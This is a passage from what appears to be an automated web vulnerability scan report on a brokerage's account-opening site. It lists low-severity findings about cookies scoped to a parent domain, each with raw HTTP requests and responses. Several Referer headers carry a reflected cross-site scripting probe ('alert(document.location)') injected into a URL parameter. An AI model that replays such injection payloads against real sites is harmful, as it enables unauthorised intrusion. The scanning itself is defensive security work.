X-Powered-By: ASP.NET
Set-Cookie: TLTHID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT


9.16. https://account.optionsxpress.com/images/newaccount/account_select1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select1.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newaccount/account_select1.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 19995
Content-Type: image/gif
Last-Modified: Mon, 16 May 2011 14:51:10 GMT
Accept-Ranges: bytes
ETag: "d7b82ab2d813cc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

...[SNIP]...

9.17. https://account.optionsxpress.com/images/newaccount/account_select2.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select2.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/account_select2.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 8859
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:17 GMT
Accept-Ranges: bytes
ETag: "e09b2bff31f1ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57018DB34D660B4883F443A4D0B4D349; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:28 GMT

...[SNIP]...

9.18. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_error_icon.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_error_icon.png HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 385
Content-Type: image/png
Last-Modified: Thu, 28 Oct 2010 18:35:54 GMT
Accept-Ranges: bytes
ETag: "b848a2f4ce76cb1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2AB1B991426954C9E6064DB17C6FCAD0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

...[SNIP]...

9.19. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_tip_icon.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_tip_icon.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 329
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:16 GMT
Accept-Ranges: bytes
ETag: "70e98fe31f1ca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=991AE206424B97B6F977F9B28BE347B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

GIF89a.............f..q..Wy.Vu.W{.T~....W|..........Z..g..X..X.Wx.Vv.......V.}.....e........_..R|...................Ny................................................................................
...[SNIP]...

9.20. https://account.optionsxpress.com/images/openAccount_bottom.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/openAccount_bottom.jpg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: TLTHID and TLTSID (both Domain=.optionsxpress.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/openAccount_bottom.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:33 GMT
Accept-Ranges: bytes
ETag: "30977b4583f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky..............Adobe.d.........................#....#"....."'.#!!#.''.030.'>>AA>>AAAAAAAAAAAAAAA................!....!1!!$!!1>-''''->8;333;8AA>>AAAAAAAAAAAAAAAAA...........
...[SNIP]...

9.21. https://account.optionsxpress.com/images/plus_new_acct.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/plus_new_acct.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: TLTHID and TLTSID (both Domain=.optionsxpress.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/plus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:17 GMT
Accept-Ranges: bytes
ETag: "b0e14052a375c51:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@./`..$...(BB.N. .r1..#4...@T"Q........(....B.J....;

9.22. https://account.optionsxpress.com/images/rightColumn_divider.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/rightColumn_divider.jpg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: TLTHID and TLTSID (both Domain=.optionsxpress.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/rightColumn_divider.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 624
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:06 GMT
Accept-Ranges: bytes
ETag: "40c45d3583f0ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......1.....!Adobe.d...........    .......%...n..................................................%$$$%)))))))))).    ..    
   .

........................................##"##))
...[SNIP]...

9.23. https://account.optionsxpress.com/images/styles/bubble/b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/b.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/b.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 95
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f0c783bc1bfcca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=77A51C33434FCC2754ED389A537B984E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.LLL...ccc.................................!.......,.............Ii...q
.H..;

9.24. https://account.optionsxpress.com/images/styles/bubble/bl.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/bl.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/bl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 1197
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "50b284bc1bfcca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E4CCE9D34E711E38DE7ADA84B79732F8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.......MMM...............___YYY...............PPP.i....www.........qqq......}}}TTT....s................~~~JJJ...ccc..............i....u...........z"....{#..2HHH........F....j........
...[SNIP]...

9.25. https://account.optionsxpress.com/images/styles/bubble/br.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/br.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/br.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 366
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "203d84bc1bfcca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=956B761F4FA5D2BDCA16DB89838483FB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
....1.....f.......ddd..................iii.................................rrr...eee.....................VVV...hhh..^.\.._.W.uN5.c    LLL|V<PPP....a.MMM...........................................
...[SNIP]...

9.26. https://account.optionsxpress.com/images/styles/bubble/l.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/l.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/l.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f05681bc1bfcca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=66E456154210275BF1AD2294C24E11C3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a...........f.......!.......,.............'.....;

9.27. https://account.optionsxpress.com/images/styles/bubble/r.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/r.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/r.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "d0881bc1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4F0588BA4BA85289A097B6894C4CDEEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a
..........f.............ddd...!.......,....
........aSD$.;

9.28. https://account.optionsxpress.com/images/styles/bubble/t.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/t.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/t.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "a0227ebc1bfcca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F7D09A6D4566E6FDAE591B92DED017AF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:51 GMT

GIF89a...........f.!.......,...........L...;

9.29. https://account.optionsxpress.com/images/styles/bubble/tl.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tl.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 117
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "d0d71abd1bfcca1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AFEC1DFC41D58A640965F69675769361; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a..........f...........y...e........d.x...2..h.........!......,.........."..I+1%.........%.#.@..fu(...1.h..F.;

9.30. https://account.optionsxpress.com/images/styles/bubble/tr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tr.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tr.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 168
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "90ac1cbd1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9A7796FB49428C50E2B66E9C59EA7A3A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
.......f................................x..m...........-...........f..R..b...........................!.......,....
.....% .X.#.W
..3.B. .P......0...P.%V..a ...;

9.31. https://account.optionsxpress.com/images/welcome/home/log_out.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

